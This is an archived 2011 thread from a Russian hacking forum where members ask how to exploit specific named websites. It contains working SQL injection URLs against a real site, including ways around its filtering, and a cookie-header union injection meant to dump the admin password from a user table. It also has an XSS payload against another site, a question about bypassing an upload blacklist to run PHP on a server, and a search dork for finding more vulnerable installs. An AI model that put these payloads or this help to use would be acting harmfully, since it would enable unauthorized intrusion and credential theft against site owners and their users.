ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

14.06.2011, 21:34
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме: 1350
Репутация:
0
|
|
Сообщение от qaz
qaz said:
Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692
сам не смог ничего сделать, пробовалв sqlhelper'e он тоже ничего не сделал кроме того что определил что это sql union inj
И у меня есть пару вопросов
есть сайт, просканил директории нашол файл .bash_history
открыл его там такое:
Код:
Code:
crontab -e
svs@a18-swforum ~ $ crontab -e
crontabs/svs: Permission denied
ls -la
ps aux
ps aux
ps aux
ps aux
ps aux
crontab -e
man crontab
exit
что это? И если на сайте отображается код JS ну например открываю ссылку site.com/pngfix.js оно мне выдает код скрипта, это нормально?
и последнее:
перебираю страницы на сайте и наткнулся на такое:
http://site.com/?id=7 страница выдала
Код:
Code:
can't select db: Could not locate entry in sysdatabases for database 'название базы'. No entry found with that name. Make sure that the name is entered correctly.
сканил сайт сканером WVS он выдал что здесь http://forum.shock-world.com/journal.php?"onmouseover=prompt(987671)>
XSS но я в них мало шарю, что с нее выжать можно?
вобщем есть за что хвататься?
|
|
|

15.06.2011, 07:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 31258
Репутация:
7
|
|
Сообщение от FlaktW
FlaktW said:
В чем причина?
Так выводится:
http://www.liftnn.ru/page.php?path=0.25)+or+(SeLect+count(*)+from+(sele ct+1+UnIoN+select+2+UnIoN+select+3)x%20+group+by+c oncat(version(),floor(rand(0)*2)))%23
Duplicate entry '5.1.41-log1' for key 'group_key'
а, так нет:
http://www.liftnn.ru/page.php?path=0.25)+or+1+group+by+concat((select+/*!table_name*/+/*!from*/+/*!information_schema*/./*!tables*/+/*!limit*/+0,1),floor(rand(0)*2))/*!having*/+count(*)+or+1%23
http://www.liftnn.ru/page.php?path=0 .25
там точка используется для разбиения переданного параметра, поэтому второй запрос и не работает
http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+ from+pages+limit+0,1),floor(rand(0)*2))having+min( 0)+or+1%23 работает
http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+ from+sttsnn_lift2.pages+limit+0,1),floor(rand(0)*2 ))having+min(0)+or+1%23 не работает, т.к. точкой разбили запрос
бруть таблицы либо ищи способ обойтись без точки
|
|
|
|

15.06.2011, 12:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 5802
Репутация:
0
|
|
Бывают 2 вида скуль инъекции это обычные и слепые, но все они находятся по разному, киньте ссылки на статьи к способам их нахождения.
|
|
|
|

15.06.2011, 12:47
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме: 278340
Репутация:
0
|
|
|
|
|

15.06.2011, 17:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 124363
Репутация:
11
|
|
Сообщение от Seravin
Seravin said:
url decode сделал хотя бы...
а вообще предположу что надо либо group_concat либо limit использовать
пробовал group_concat либо limit не выводит ничего
|
|
|
|

15.06.2011, 22:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 31258
Репутация:
7
|
|
есть уязвимый сервер, могу заливать все типы файлов кроме:
$Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc', 'pl','bat','exe','dll','reg') ;
пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются
сервер под nginx, поэтому htaccess не пойдет
lfi не нашел
что можно еще поробовать?
|
|
|
|

15.06.2011, 23:01
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме: 116125
Репутация:
3
|
|
кусок уязвимого кода
Сообщение от None
";
echo $row["username"];
echo "";
echo $row["visits"];
echo "";
}
echo "";
?>
структура таблицы
Сообщение от None
CREATE TABLE `tb_users` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(15) NOT NULL,
`password` varchar(100) NOT NULL,
`ip` varchar(15) NOT NULL,
`email` varchar(150) NOT NULL,
`pemail` varchar(150) NOT NULL,
`referer` varchar(15) NOT NULL,
`country` varchar(150) NOT NULL,
`visits` varchar(150) NOT NULL default '0',
`referals` varchar(150) NOT NULL default '0',
`referalvisits` varchar(150) NOT NULL default '0',
`money` varchar(150) NOT NULL default '0.00',
`paid` varchar(150) NOT NULL default '0.00',
`joindate` varchar(150) NOT NULL,
`lastlogdate` varchar(150) NOT NULL,
`lastiplog` varchar(150) NOT NULL,
`account` varchar(150) NOT NULL,
`user_status` varchar(15) NOT NULL default 'user',
KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=20 ;
чему должна быть равна переменная $lole для вывода password where username admin?
|
|
|

15.06.2011, 23:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 34733
Репутация:
83
|
|
Сообщение от vaddd
vaddd said:
кусок уязвимого кода
структура таблицы
чему должна быть равна переменная $lole для вывода password where username admin?
Должно быть mq = off;
Попробуй
Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1
Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).
|
|
|
|

15.06.2011, 23:24
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме: 116125
Репутация:
3
|
|
Сообщение от Фараон
Фараон said:
Должно быть mq = off;
Попробуй
Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1
Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).
inurl:advertisewmz.php
уязвимый сценарий referals.php, он в той же папке
спасибо за ответ, попробую завтра
принтабельные цифры будут 2,9?
|
|
|

15.06.2011, 23:26
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме: 278340
Репутация:
0
|
|
Сообщение от freezed
freezed said:
есть уязвимый сервер, могу заливать все типы файлов кроме:
$Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc', 'pl','bat','exe','dll','reg') ;
пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются
сервер под nginx, поэтому htaccess не пойдет
lfi не нашел
что можно еще поробовать?
Попробуй что нибудь из этого
Минифак по загрузке php кода вместо картинок
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|